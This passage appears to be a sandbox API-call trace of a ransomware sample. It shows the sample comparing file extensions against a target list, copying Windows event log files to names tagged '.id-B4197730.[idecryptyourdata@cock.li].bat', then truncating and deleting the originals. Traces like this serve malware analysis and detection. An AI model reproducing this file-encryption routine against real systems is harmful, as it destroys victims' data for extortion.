lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.313] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.313] lstrlenW (lpString=".dbf") returned 4 [0061.313] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.313] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.313] lstrlenW (lpString=".1cd") returned 4 [0061.313] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.313] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.313] lstrlenW (lpString=".jpg") returned 4 [0061.313] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.314] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.314] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.314] lstrlenW (lpString=".doc") returned 4 [0061.314] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.314] lstrlenW (lpString=".docx") returned 5 [0061.314] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.314] lstrlenW (lpString=".pdf") returned 4 [0061.314] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.314] lstrlenW (lpString=".xls") returned 4 [0061.314] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.314] lstrlenW (lpString=".xlsx") returned 5 [0061.314] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.314] lstrlenW (lpString=".ppt") returned 4 [0061.314] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.314] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.314] lstrlenW (lpString=".zip") returned 4 [0061.314] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.314] lstrlenW (lpString=".rar") returned 4 [0061.314] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.314] lstrlenW (lpString=".bz2") returned 4 [0061.314] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.314] lstrlenW (lpString=".7z") returned 3 [0061.315] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.315] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.315] lstrlenW (lpString=".dbf") returned 4 [0061.315] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.315] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.315] lstrlenW (lpString=".1cd") returned 4 [0061.315] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.315] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0061.315] lstrlenW (lpString=".jpg") returned 4 [0061.315] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.315] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0061.315] lstrlenW (lpString="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 56 [0061.315] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0061.315] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0061.315] CloseHandle (hObject=0x384) returned 1 [0061.315] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx")) returned 0x20 [0061.315] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.316] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0061.316] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.316] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.316] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0061.320] GetLastError () returned 0x0 [0061.321] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0061.322] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0061.324] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.324] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x144, lpOverlapped=0x0) returned 1 [0061.324] SetEndOfFile (hFile=0x388) returned 1 [0061.324] CloseHandle (hObject=0x388) returned 1 [0061.326] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.326] SetEndOfFile (hFile=0x384) returned 1 [0061.327] CloseHandle (hObject=0x384) returned 1 [0061.327] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0061.328] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx")) returned 1 [0061.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.328] lstrlenW (lpString=".doc") returned 4 [0061.328] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.328] lstrlenW (lpString=".docx") returned 5 [0061.328] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.328] lstrlenW (lpString=".pdf") returned 4 [0061.328] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.328] lstrlenW (lpString=".xls") returned 4 [0061.328] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.328] lstrlenW (lpString=".xlsx") returned 5 [0061.328] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.328] lstrlenW (lpString=".ppt") returned 4 [0061.328] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.328] lstrlenW (lpString=".zip") returned 4 [0061.328] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.328] lstrlenW (lpString=".rar") returned 4 [0061.328] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.329] lstrlenW (lpString=".bz2") returned 4 [0061.329] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.329] lstrlenW (lpString=".7z") returned 3 [0061.329] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.329] lstrlenW (lpString=".dbf") returned 4 [0061.329] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.329] lstrlenW (lpString=".1cd") returned 4 [0061.329] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.329] lstrlenW (lpString=".jpg") returned 4 [0061.329] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.329] lstrlenW (lpString=".doc") returned 4 [0061.329] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.329] lstrlenW (lpString=".docx") returned 5 [0061.329] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.329] lstrlenW (lpString=".pdf") returned 4 [0061.329] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.329] lstrlenW (lpString=".xls") returned 4 [0061.329] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.329] lstrlenW (lpString=".xlsx") returned 5 [0061.329] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.329] lstrlenW (lpString=".ppt") returned 4 [0061.329] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.330] lstrlenW (lpString=".zip") returned 4 [0061.330] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.330] lstrlenW (lpString=".rar") returned 4 [0061.330] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.330] lstrlenW (lpString=".bz2") returned 4 [0061.330] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.330] lstrlenW (lpString=".7z") returned 3 [0061.330] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.330] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.330] lstrlenW (lpString=".dbf") returned 4 [0061.330] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.330] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.330] lstrlenW (lpString=".1cd") returned 4 [0061.330] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.330] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0061.330] lstrlenW (lpString=".jpg") returned 4 [0061.330] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.330] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0061.330] lstrlenW (lpString="Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 46 [0061.330] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0061.330] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0061.330] CloseHandle (hObject=0x384) returned 1 [0061.331] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx")) returned 0x20 [0061.331] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.331] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0061.331] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.331] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.331] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0061.331] GetLastError () returned 0x0 [0061.331] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0061.333] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0061.335] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.335] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x130, lpOverlapped=0x0) returned 1 [0061.335] SetEndOfFile (hFile=0x388) returned 1 [0061.335] CloseHandle (hObject=0x388) returned 1 [0061.337] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.337] SetEndOfFile (hFile=0x384) returned 1 [0061.338] CloseHandle (hObject=0x384) returned 1 [0061.338] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0061.339] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx")) returned 1 [0061.339] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.339] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.339] lstrlenW (lpString=".doc") returned 4 [0061.339] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.339] lstrlenW (lpString=".docx") returned 5 [0061.339] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.339] lstrlenW (lpString=".pdf") returned 4 [0061.339] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.339] lstrlenW (lpString=".xls") returned 4 [0061.339] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.339] lstrlenW (lpString=".xlsx") returned 5 [0061.339] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.339] lstrlenW (lpString=".ppt") returned 4 [0061.340] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.340] lstrlenW (lpString=".zip") returned 4 [0061.340] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString=".rar") returned 4 [0061.340] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString=".bz2") returned 4 [0061.340] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString=".7z") returned 3 [0061.340] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.340] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.340] lstrlenW (lpString=".dbf") returned 4 [0061.340] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.340] lstrlenW (lpString=".1cd") returned 4 [0061.340] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.340] lstrlenW (lpString=".jpg") returned 4 [0061.340] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.340] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.340] lstrlenW (lpString=".doc") returned 4 [0061.340] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString=".docx") returned 5 [0061.340] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.340] lstrlenW (lpString=".pdf") returned 4 [0061.340] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString=".xls") returned 4 [0061.340] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.340] lstrlenW (lpString=".xlsx") returned 5 [0061.340] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.340] lstrlenW (lpString=".ppt") returned 4 [0061.341] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.341] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.341] lstrlenW (lpString=".zip") returned 4 [0061.341] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.341] lstrlenW (lpString=".rar") returned 4 [0061.341] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.341] lstrlenW (lpString=".bz2") returned 4 [0061.341] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.341] lstrlenW (lpString=".7z") returned 3 [0061.341] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.341] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.341] lstrlenW (lpString=".dbf") returned 4 [0061.341] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.341] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.341] lstrlenW (lpString=".1cd") returned 4 [0061.341] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.341] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0061.341] lstrlenW (lpString=".jpg") returned 4 [0061.341] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.341] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0061.341] lstrlenW (lpString="Microsoft-Windows-AppReadiness%4Admin.evtx") returned 42 [0061.341] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0061.341] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0061.341] CloseHandle (hObject=0x384) returned 1 [0061.342] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx")) returned 0x20 [0061.342] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.342] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0061.342] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.342] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.342] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0061.342] GetLastError () returned 0x0 [0061.342] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0062.080] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0062.082] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.082] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x128, lpOverlapped=0x0) returned 1 [0062.083] SetEndOfFile (hFile=0x388) returned 1 [0063.147] CloseHandle (hObject=0x388) returned 1 [0063.149] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.149] SetEndOfFile (hFile=0x384) returned 1 [0063.150] CloseHandle (hObject=0x384) returned 1 [0063.150] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0063.150] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx")) returned 1 [0063.150] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.150] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.150] lstrlenW (lpString=".doc") returned 4 [0063.150] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString=".docx") returned 5 [0063.151] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.151] lstrlenW (lpString=".pdf") returned 4 [0063.151] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString=".xls") returned 4 [0063.151] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString=".xlsx") returned 5 [0063.151] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.151] lstrlenW (lpString=".ppt") returned 4 [0063.151] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.151] lstrlenW (lpString=".zip") returned 4 [0063.151] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString=".rar") returned 4 [0063.151] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString=".bz2") returned 4 [0063.151] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString=".7z") returned 3 [0063.151] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.151] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.151] lstrlenW (lpString=".dbf") returned 4 [0063.151] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.151] lstrlenW (lpString=".1cd") returned 4 [0063.151] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.151] lstrlenW (lpString=".jpg") returned 4 [0063.151] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.151] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.151] lstrlenW (lpString=".doc") returned 4 [0063.151] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString=".docx") returned 5 [0063.151] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.151] lstrlenW (lpString=".pdf") returned 4 [0063.151] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.151] lstrlenW (lpString=".xls") returned 4 [0063.152] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.152] lstrlenW (lpString=".xlsx") returned 5 [0063.152] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.152] lstrlenW (lpString=".ppt") returned 4 [0063.152] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.152] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.152] lstrlenW (lpString=".zip") returned 4 [0063.152] 